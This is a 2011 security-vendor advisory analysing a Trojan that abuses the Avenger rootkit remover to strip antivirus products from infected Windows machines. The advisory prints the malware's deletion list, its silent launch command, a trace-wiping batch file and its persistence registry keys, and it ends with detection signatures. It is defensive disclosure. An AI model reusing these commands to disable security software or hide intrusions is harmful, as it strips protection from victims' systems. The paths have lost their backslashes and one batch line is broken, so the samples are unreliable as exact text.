Trojan uses Rootkit remover tool to disable Anti-virus (Dec 1, 2011)


The Sonicwall UTM research team received reports of a new KillAV Trojan in the wild. This Trojan uses a rootkit remover tool called The Avenger. According to the home page of this tool “The Avenger is a fully-scriptable, kernel-level Windows driver designed to remove highly persistent files, registry keys/values, and other drivers protected by entrenched malware”. Ironically, the Trojan uses this anti malware tool to remove files belonging to a variety of well known anti-virus software from vendors such as AVG, Kaspersky and Symantec. Most anti-virus software protects its files from user-mode removal. However, it is very hard to protect such files from kernel-mode attacks.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:DRIVERS10KDESCK.exe [Avenger executable]
  • C:DRIVERS10TDESCK.txt [Avenger file instructions]
  • C:WINDOWSsystem32eihs.txt [Avenger file instructions]
  • C:DRIVERS10WINNTK.exe [Detected as GAV: KillFiles.NEK (Trojan)]
  • C:cleanup.exe [Detected as GAV: Zapchast.M (Trojan)]
  • C:cleanup.bat [Cleanup instructions]
  • C:zip.exe [Zip utility]
  • C:WINDOWSsystem32driverstsfqiza.sys [Avenger kernel-mode driver]

TDESCK.txt contains the following information:

      Folders to delete:
      %ProgramFiles%Panda Security
      %ProgramFiles%Microsoft Security Client
      Files to move:
      %ProgramFiles%Alwil SoftwareAvast5AvastUI.exe|%ProgramFiles%Alwil SoftwareAvast5AvastUI.exa
      %ProgramFiles%Alwil SoftwareAvast5AvastSvc.exe|%ProgramFiles%Alwil SoftwareAvast5AvastSvc.exa
      %ProgramFiles%AVAST SoftwareAvastAvastSvc.exe|%ProgramFiles%AVAST SoftwareAvastAvastSvc.exa
      %ProgramFiles%AVAST SoftwareAvastAvastUI.exe|%ProgramFiles%AVAST SoftwareAvastAvastUI.exa

The above information instructs the Avenger software to remove or move files and directories belonging to various anti-virus software.

Upon infection, the following command is run to remove the anti-virus files listed above in TDESCK.txt. This command runs Avenger invisibly without its GUI:

      cmd /c C:DRIVERS10KDESCK.exe /nogui C:DRIVERS10TDESCK.txt

cleanup.bat contains the following information:

      @ECHO OFF
      cd %systemdrive%
      if exist move /y "%systemdrive%avengerbackup-%date:/"
      move /y backup.reg %systemdrive%avenger
      copy /y avenger.txt %systemdrive%avenger
      for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:avenger attrib -r -h -s %%a:avenger* /S /D & zip -r -S -q -m -! -P infected "" %%a:avenger* -x %systemdrive%avengerbackup*.zip & rmdir %%a:avenger
      del zip.exe
      del cleanup.exe
      del cleanup.bat

The Trojan adds the following keys to the Windows registry to install the Avenger kernel-mode driver and run WINNTK.exe and cleanup.exe after reboot:

  • HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun Microsoft Windows Debug “C:DRIVERS10WINNTK.exe”
  • HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce Cleanup “C:cleanup.exe”
  • HKEY_LOCAL_MACHINESystemCurrentControlSetServicesmmjnbxj ImagePath “C:WINDOWSsystem32driverstsfqiza.sys”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmmjnbxj cvva “C:WINDOWSsystem32eihs.txt”

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: KillFiles.NEK (Trojan)
  • GAV: Zapchast.M (Trojan)
Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.